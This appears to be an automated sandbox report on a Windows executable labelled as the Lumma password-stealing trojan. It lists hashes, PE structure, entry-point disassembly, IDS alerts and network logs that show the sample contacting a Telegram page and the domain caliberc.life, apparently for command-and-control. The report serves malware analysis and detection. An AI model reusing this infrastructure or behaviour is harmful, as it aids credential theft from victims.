                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe
                                                                          File size:1'315'328 bytes
                                                                          MD5:f30e34c685fe30cd96083e650fcb70f1
                                                                          SHA1:82664dc39ac325151d4dda923b54585e8ebccee9
                                                                          SHA256:210df8c2bdf091c680e289d7fb9d8ffd90044f5995e08cc5bc94d55865d793b1
                                                                          SHA512:5356a4002da934e228e7de3d3e6ddb97a1c88683aae65fd6492899a5f4a538c5e0699068e56790e5165911b7e54b2831236c76f9491d4bfa17cbc140f5763227
                                                                          SSDEEP:24576:HfOM1rXq19WPe7p3p4QvBmF2tBl5wisq3ubb1M4C5+fTCPee0ol37RReGak:HfOM1re/CQUgldf3U1MFQQrcS
                                                                          TLSH:60553328E005912BFBE334354696BEF03E7A4F323179906D9D6DC5A98A91015AFB1F33
                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.g.............................5............@...........................<...........@................................. `.....
                                                                          Icon Hash:90cececece8e8eb0
                                                                          Entrypoint:0x4035e7
                                                                          Entrypoint Section:
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x67D03415 [Tue Mar 11 13:01:09 2025 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:6
                                                                          OS Version Minor:0
                                                                          File Version Major:6
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:6
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:71cc5af9daad65e58c6f29c42cdf9201
                                                                          Instruction
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          add esp, FFFFFFF0h
                                                                          mov eax, 00401000h
                                                                          call 00007FAD40800506h
                                                                          call far 5DE5h : 8B10C483h
                                                                          jmp 00007FAD40BC6E32h
                                                                          js 00007FAD40800533h
                                                                          sbb esp, dword ptr [ebp+61A248A0h]
                                                                          insd
                                                                          retf
                                                                          das
                                                                          arpl word ptr [ebp-2A6F86DAh], dx
                                                                          jno 00007FAD40800554h
                                                                          add eax, 4D01F7F6h
                                                                          push esi
                                                                          clc
                                                                          enter 63B1h, 02h
                                                                          mov cl, 3Bh
                                                                          xor dword ptr [ecx-50336360h], edx
                                                                          cmc
                                                                          inc ebx
                                                                          retf
                                                                          and byte ptr [esp+esi*2], 0000001Eh
                                                                          sub esp, ebp
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2e60200x214.data
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e60000xc.data
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          0x10000x510000x29a00512d3d551597b7161629b58077fa8ec7False1.0003577796546546data7.99889700577149IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          0x520000x30000x1000b6717a02af6ebd7c55a864fa0986dad4False1.000732421875data7.941818540153546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          0x550000xe0000x32009516e05851c280d8032e974b8c014bfaFalse0.97109375data7.913671463478191IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          0x630000x40000x2200377010cf2de49560727dde4e9f4375aaFalse1.0012637867647058data7.977822899513002IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          0x670000x27f0000x2ba004353c9737927d55ffc1958e9ef6c0c53unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .data0x2e60000xe60000xe560069370175886edcd5f78d434cab93ed41False0.9967387602179837data7.978649088354937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          DLLImport
                                                                          kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                                                          user32.dllMessageBoxA
                                                                          advapi32.dllRegCloseKey
                                                                          oleaut32.dllSysFreeString
                                                                          gdi32.dllCreateFontA
                                                                          shell32.dllShellExecuteA
                                                                          version.dllGetFileVersionInfoA
                                                                          ole32.dllCoCreateInstance
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2025-03-17T04:17:06.007957+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449720149.154.167.99443TCP
                                                                          2025-03-17T04:17:06.763933+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449721104.21.48.1443TCP
                                                                          2025-03-17T04:17:08.533959+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449722104.21.48.1443TCP
                                                                          2025-03-17T04:17:09.801771+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449723104.21.48.1443TCP
                                                                          2025-03-17T04:17:10.894017+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449724104.21.48.1443TCP
                                                                          2025-03-17T04:17:12.355119+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449727104.21.48.1443TCP
                                                                          2025-03-17T04:17:13.641728+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449728104.21.48.1443TCP
                                                                          2025-03-17T04:17:16.094731+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.48.1443TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Mar 17, 2025 04:17:05.372288942 CET49720443192.168.2.4149.154.167.99
                                                                          Mar 17, 2025 04:17:05.372339010 CET44349720149.154.167.99192.168.2.4
                                                                          Mar 17, 2025 04:17:05.372431993 CET49720443192.168.2.4149.154.167.99
                                                                          Mar 17, 2025 04:17:05.375848055 CET49720443192.168.2.4149.154.167.99
                                                                          Mar 17, 2025 04:17:05.375866890 CET44349720149.154.167.99192.168.2.4
                                                                          Mar 17, 2025 04:17:06.007762909 CET44349720149.154.167.99192.168.2.4
                                                                          Mar 17, 2025 04:17:06.007956982 CET49720443192.168.2.4149.154.167.99
                                                                          Mar 17, 2025 04:17:06.015307903 CET49720443192.168.2.4149.154.167.99
                                                                          Mar 17, 2025 04:17:06.015341997 CET44349720149.154.167.99192.168.2.4
                                                                          Mar 17, 2025 04:17:06.015542030 CET44349720149.154.167.99192.168.2.4
                                                                          Mar 17, 2025 04:17:06.056890011 CET49720443192.168.2.4149.154.167.99
                                                                          Mar 17, 2025 04:17:06.065571070 CET49720443192.168.2.4149.154.167.99
                                                                          Mar 17, 2025 04:17:06.112325907 CET44349720149.154.167.99192.168.2.4
                                                                          Mar 17, 2025 04:17:06.264983892 CET44349720149.154.167.99192.168.2.4
                                                                          Mar 17, 2025 04:17:06.265012026 CET44349720149.154.167.99192.168.2.4
                                                                          Mar 17, 2025 04:17:06.265019894 CET44349720149.154.167.99192.168.2.4
                                                                          Mar 17, 2025 04:17:06.265054941 CET44349720149.154.167.99192.168.2.4
                                                                          Mar 17, 2025 04:17:06.265124083 CET44349720149.154.167.99192.168.2.4
                                                                          Mar 17, 2025 04:17:06.265177965 CET49720443192.168.2.4149.154.167.99
                                                                          Mar 17, 2025 04:17:06.265252113 CET49720443192.168.2.4149.154.167.99
                                                                          Mar 17, 2025 04:17:06.268208981 CET49720443192.168.2.4149.154.167.99
                                                                          Mar 17, 2025 04:17:06.268234968 CET44349720149.154.167.99192.168.2.4
                                                                          Mar 17, 2025 04:17:06.268245935 CET49720443192.168.2.4149.154.167.99
                                                                          Mar 17, 2025 04:17:06.268253088 CET44349720149.154.167.99192.168.2.4
                                                                          Mar 17, 2025 04:17:06.304178953 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:06.304214001 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:06.304279089 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:06.304702997 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:06.304713964 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:06.763819933 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:06.763932943 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:06.859838963 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:06.859869003 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:06.860188007 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:06.861404896 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:06.861429930 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:06.861470938 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.520018101 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.520062923 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.520090103 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.520123005 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:07.520132065 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.520140886 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.520179033 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:07.520190001 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.520235062 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:07.520246983 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.520742893 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.520767927 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.520787954 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:07.520792961 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.520837069 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:07.524534941 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.572491884 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:07.572518110 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.619340897 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:07.774673939 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.774753094 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.774873018 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:07.775017977 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:07.775037050 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:07.775048971 CET49721443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:07.775053978 CET44349721104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:08.080504894 CET49722443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:08.080538988 CET44349722104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:08.080610037 CET49722443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:08.080975056 CET49722443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:08.080982924 CET44349722104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:08.533888102 CET44349722104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:08.533958912 CET49722443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:08.535546064 CET49722443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:08.535554886 CET44349722104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:08.535757065 CET44349722104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:08.537205935 CET49722443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:08.537439108 CET49722443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:08.537466049 CET44349722104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:08.537530899 CET49722443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:08.537539005 CET44349722104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:09.244021893 CET44349722104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:09.244127035 CET44349722104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:09.244227886 CET49722443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:09.244581938 CET49722443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:09.244602919 CET44349722104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:09.325390100 CET49723443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:09.325443983 CET44349723104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:09.325529099 CET49723443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:09.325886965 CET49723443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:09.325901985 CET44349723104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:09.801685095 CET44349723104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:09.801770926 CET49723443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:09.812943935 CET49723443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:09.812968969 CET44349723104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:09.813287973 CET44349723104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:09.825375080 CET49723443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:09.825501919 CET49723443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:09.825529099 CET44349723104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:10.255064964 CET44349723104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:10.255162954 CET44349723104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:10.255369902 CET49723443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:10.255495071 CET49723443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:10.255517960 CET44349723104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:10.426249027 CET49724443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:10.426295996 CET44349724104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:10.426371098 CET49724443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:10.426784039 CET49724443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:10.426796913 CET44349724104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:10.893851995 CET44349724104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:10.894016981 CET49724443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:10.901732922 CET49724443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:10.901758909 CET44349724104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:10.901999950 CET44349724104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:10.903275967 CET49724443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:10.903399944 CET49724443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:10.903433084 CET44349724104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:10.903507948 CET49724443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:10.903507948 CET49724443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:10.903521061 CET44349724104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:10.944334030 CET44349724104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:11.458971977 CET44349724104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:11.459083080 CET44349724104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:11.459145069 CET49724443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:11.459253073 CET49724443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:11.459268093 CET44349724104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:11.872844934 CET49727443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:11.872903109 CET44349727104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:11.872978926 CET49727443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:11.873334885 CET49727443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:11.873349905 CET44349727104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:12.355031967 CET44349727104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:12.355118990 CET49727443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:12.356489897 CET49727443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:12.356503963 CET44349727104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:12.356745958 CET44349727104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:12.358736038 CET49727443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:12.358860016 CET49727443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:12.358885050 CET44349727104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:12.770551920 CET44349727104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:12.770661116 CET44349727104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:12.770914078 CET49727443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:12.770955086 CET49727443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:12.770973921 CET44349727104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.166033983 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.166079998 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.166172981 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.166568041 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.166583061 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.641578913 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.641727924 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.649399996 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.649420023 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.649663925 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.650974989 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.651726961 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.651755095 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.651859999 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.651897907 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.652014971 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.652059078 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.652192116 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.652223110 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.652358055 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.652398109 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.652520895 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.652553082 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.652585030 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.652599096 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.652719021 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.652749062 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.652774096 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.652920961 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.652952909 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.663065910 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.663207054 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.663233995 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.663255930 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.663284063 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:13.663294077 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.663310051 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:13.663341045 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:15.601413965 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:15.601527929 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:15.601576090 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:15.601732016 CET49728443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:15.601746082 CET44349728104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:15.637945890 CET49731443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:15.637976885 CET44349731104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:15.638046980 CET49731443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:15.638513088 CET49731443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:15.638525009 CET44349731104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:16.094649076 CET44349731104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:16.094731092 CET49731443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:16.096173048 CET49731443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:16.096185923 CET44349731104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:16.096430063 CET44349731104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:16.098298073 CET49731443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:16.098326921 CET49731443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:16.098372936 CET44349731104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:16.528358936 CET44349731104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:16.528434038 CET44349731104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:16.528882980 CET49731443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:16.528969049 CET49731443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:16.528984070 CET44349731104.21.48.1192.168.2.4
                                                                          Mar 17, 2025 04:17:16.529001951 CET49731443192.168.2.4104.21.48.1
                                                                          Mar 17, 2025 04:17:16.529006958 CET44349731104.21.48.1192.168.2.4
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Mar 17, 2025 04:17:05.359153032 CET5814153192.168.2.41.1.1.1
                                                                          Mar 17, 2025 04:17:05.365916014 CET53581411.1.1.1192.168.2.4
                                                                          Mar 17, 2025 04:17:06.290911913 CET5819453192.168.2.41.1.1.1
                                                                          Mar 17, 2025 04:17:06.303128004 CET53581941.1.1.1192.168.2.4
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Mar 17, 2025 04:17:05.359153032 CET192.168.2.41.1.1.10x5467Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                          Mar 17, 2025 04:17:06.290911913 CET192.168.2.41.1.1.10xfecaStandard query (0)caliberc.lifeA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Mar 17, 2025 04:17:05.365916014 CET1.1.1.1192.168.2.40x5467No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                          Mar 17, 2025 04:17:06.303128004 CET1.1.1.1192.168.2.40xfecaNo error (0)caliberc.life104.21.48.1A (IP address)IN (0x0001)false
                                                                          Mar 17, 2025 04:17:06.303128004 CET1.1.1.1192.168.2.40xfecaNo error (0)caliberc.life104.21.64.1A (IP address)IN (0x0001)false
                                                                          Mar 17, 2025 04:17:06.303128004 CET1.1.1.1192.168.2.40xfecaNo error (0)caliberc.life104.21.32.1A (IP address)IN (0x0001)false
                                                                          Mar 17, 2025 04:17:06.303128004 CET1.1.1.1192.168.2.40xfecaNo error (0)caliberc.life104.21.16.1A (IP address)IN (0x0001)false
                                                                          Mar 17, 2025 04:17:06.303128004 CET1.1.1.1192.168.2.40xfecaNo error (0)caliberc.life104.21.96.1A (IP address)IN (0x0001)false
                                                                          Mar 17, 2025 04:17:06.303128004 CET1.1.1.1192.168.2.40xfecaNo error (0)caliberc.life104.21.112.1A (IP address)IN (0x0001)false
                                                                          Mar 17, 2025 04:17:06.303128004 CET1.1.1.1192.168.2.40xfecaNo error (0)caliberc.life104.21.80.1A (IP address)IN (0x0001)false
                                                                          • t.me
                                                                          • caliberc.life
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.449720149.154.167.994437872C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-17 03:17:06 UTC67OUTGET /owowoowokk3j4 HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Host: t.me
                                                                          2025-03-17 03:17:06 UTC512INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Mon, 17 Mar 2025 03:17:06 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Content-Length: 12409
                                                                          Connection: close
                                                                          Set-Cookie: stel_ssid=d8f552d865141d84e1_11026587204111057434; expires=Tue, 18 Mar 2025 03:17:06 GMT; path=/; samesite=None; secure; HttpOnly
                                                                          Pragma: no-cache
                                                                          Cache-control: no-store
                                                                          X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                          Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                          Strict-Transport-Security: max-age=35768000
